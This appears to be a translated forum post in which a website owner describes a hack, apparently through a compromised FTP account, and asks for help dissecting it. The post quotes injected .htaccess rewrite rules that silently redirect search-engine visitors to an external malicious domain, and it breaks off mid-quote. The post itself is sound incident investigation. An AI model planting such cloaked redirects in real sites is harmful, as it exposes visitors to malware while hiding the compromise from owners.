通过受感染的FTP帐户剖析网站攻击
我的网站已被黑客入侵,目前,我知道一些细节,但对于确切的发生方式或将来如何阻止它,我一无所知。我需要您的帮助来剖析攻击,以防止再次发生。这有点长,但是我想确保提供足够的信息来帮助解决问题。 这是发生了什么事。 几周前,我收到托管公司GoDaddy的电子邮件,说我的网站使用了太多资源,他们期望MySQL查询是罪魁祸首。有问题的查询是其中包含5-6个字词的搜索查询。我设置的方式越多,搜索的词越多,查询变得越复杂。没问题。我已修复它,但与此同时,GoDaddy也暂时关闭了我的帐户,大约3天后一切恢复正常。 发生此事件后,我的搜索引擎流量急剧下降了大约90%。我很没想到,它很烂,将其写到惨败的查询中,并确定它会在Google重新抓取该网站后及时返回。没有。 几天前,我收到用户的电子邮件,说我的网站托管了恶意软件。我直接在浏览器中加载了该网站,但没有看到任何内容注入该页面。然后,我检查了.htaccess文件,发现了以下内容: <IfModule mod_rewrite.c> RewriteEngine On RewriteOptions inherit RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC] RewriteRule .* http://sokoloperkovuskeci.com/in.php?g=584 …